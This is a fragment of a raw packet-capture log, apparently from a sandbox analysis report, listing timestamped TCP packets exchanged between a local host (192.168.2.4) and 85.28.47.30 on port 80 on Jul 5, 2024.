                                                                Jul 5, 2024 04:25:27.468206882 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468245983 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468252897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468256950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468272924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468300104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468310118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468319893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468326092 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468326092 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468331099 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468375921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468415976 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468460083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468470097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468480110 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468494892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468503952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468508005 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468516111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468527079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468538046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468539953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468549013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468561888 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468579054 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468600035 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468954086 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468969107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468988895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468998909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469012022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469022989 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469046116 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469069958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469079971 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469089031 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469095945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469136953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469136953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469163895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469175100 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469186068 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469197989 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469230890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469242096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.469258070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469258070 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469285011 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.469285011 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479307890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479316950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479336023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479346037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479356050 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479372978 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479407072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479412079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479423046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479434013 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479475975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479490995 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479569912 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479581118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479589939 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479599953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479610920 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479624033 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479628086 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479652882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479659081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479659081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479670048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479722023 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479722023 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479809999 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479891062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479902029 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479912043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479964018 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479964972 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479965925 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.479974031 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479984045 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.479994059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480050087 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480074883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480084896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480097055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480107069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480129957 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480173111 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480191946 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480249882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480261087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480277061 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480305910 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480305910 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480334044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480345011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480355978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480367899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480390072 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480411053 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480495930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480508089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480516911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480525970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480573893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480573893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480654955 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480664968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480676889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480685949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480696917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480740070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480755091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480763912 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480868101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480878115 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480889082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480899096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480927944 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480940104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480952024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480959892 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.480969906 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480979919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480990887 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.480993986 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.481002092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.481010914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.481041908 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.481081009 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.540216923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540234089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540244102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540252924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540266037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540278912 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540290117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540297031 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.540301085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.540332079 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.540404081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.550857067 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550867081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550877094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550935984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550950050 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550960064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.550970078 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.550971985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551018000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.551018000 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.551049948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551060915 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551071882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551081896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551093102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551152945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.551152945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.551173925 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551235914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.551402092 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.561781883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561791897 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561801910 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561813116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561840057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561850071 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561860085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561868906 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.561901093 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.561901093 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.561929941 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561940908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561950922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561960936 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.561980963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562032938 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562045097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562055111 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562064886 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562078953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562124014 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562124968 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562220097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562231064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562247038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562263012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562273979 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562284946 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562308073 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562347889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562357903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562364101 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562371016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562448025 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562653065 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562741041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562751055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562762022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562772036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562796116 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562824011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562834024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562844038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562844992 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562855005 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562869072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.562879086 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562894106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.562894106 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573188066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573198080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573208094 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573285103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573295116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573304892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573312044 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573316097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573331118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573343039 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573359013 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573388100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573388100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573405027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573415041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573425055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573437929 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573447943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573460102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573472977 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573534012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573542118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573560953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573576927 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573620081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573620081 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573628902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573640108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573651075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573667049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573699951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573726892 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573890924 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573901892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573918104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573928118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573952913 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.573990107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.573999882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574001074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574011087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574023008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574045897 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574073076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574073076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574073076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574084997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574095011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574150085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574150085 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574258089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574268103 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574278116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574320078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574331045 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574373007 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574383974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574393034 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574393034 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574421883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574421883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574486971 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574542046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574552059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574608088 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574610949 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574610949 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574620008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574630022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574641943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574729919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574739933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574750900 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574754953 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574767113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574778080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574789047 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.574805021 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574805021 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.574866056 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.575088024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.575162888 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.634071112 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634242058 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634306908 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.634314060 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634324074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634335041 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634363890 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634373903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634383917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.634434938 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.634434938 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.645065069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645128012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645147085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645159006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645168066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645179987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645205021 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.645212889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645222902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645232916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645235062 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.645247936 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645260096 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645306110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.645306110 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.645411968 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645422935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.645432949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.647409916 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.655580997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655643940 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655654907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655709982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655720949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655730963 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655735016 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.655740976 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655797958 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655807972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655819893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655827045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.655828953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.655870914 CEST804990385.28.47.30192.168.2.4
